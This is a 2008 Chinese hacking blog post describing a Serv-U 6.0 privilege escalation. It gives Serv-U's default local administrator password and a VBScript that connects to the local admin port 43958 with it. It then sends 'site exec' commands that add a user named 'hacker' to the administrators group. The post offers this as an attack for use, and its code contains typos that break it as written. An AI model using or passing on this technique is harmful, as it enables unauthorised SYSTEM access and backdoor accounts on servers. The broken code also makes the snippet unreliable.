From:老邪的博客
适用环境:服务器禁用FSO,关掉Wscript.shelll,没有执行权限。
限制:没有更改管理员的密码,或者破解出了Serv-U 的管理员的密码。Serv-U默认用户名:localadministrator 密码:#|@$ak#.|k;0@p 下面用 MSWinsock.Winsock建立一个连接,并且以System权限添加超级用户,代码如下:
以下是引用片段:
Dim revdata
Dim sendata
Set sock=createobject(“MSWinsock.Winsock”)
Sock.protocol=0
Sock.connect “127.0.0.1”,43958
Sendata=”LocalAdministrator”& chr(10) &chr(13)
Sock.senddata snedata
Sendata=”#|@$ak#.|k;0@p” &chr(10) &chr(13)
Sock.senddata.sendata
使用这个代码就可以连上FTP了,接下来用Sock.senddata sendata 发送添加有执行权限用户的命令,想必大家该知道怎么做了吧,对了,就是用”site exec net user hacker hacker /add” “site exec net localgroup administrators hacker /add”
Serv-u6.0提权新玩法
Tags:渗透提权
添加书签: [QQ书签] [百度搜藏] [新浪ViVi] [365Key网摘] [天极网摘] [我摘] [POCO网摘] [和讯网摘]
2008-4-27 20:44:35 | 发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
- 相关文章:
渗透工具hijack使用原版说明 (2008-4-15 7:22:48)
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
![[POCO网摘]](javascript:d=document;t=d.selection?(d.selection.type!='None'?d.selection.createRange().text:''):(d.getSelection?d.getSelection():'');void(keyit=window.open('http://my.poco.cn/fav/storeIt.php?t='+escape(d.title)+'&u='+escape(d.location.href)+'&c='+escape(t)+'&img=http://www.h-strong.com/blog/logo.gif','keyit','scrollbars=no,width=475,height=575,status=no,resizable=yes'));keyit.focus();){kind=link}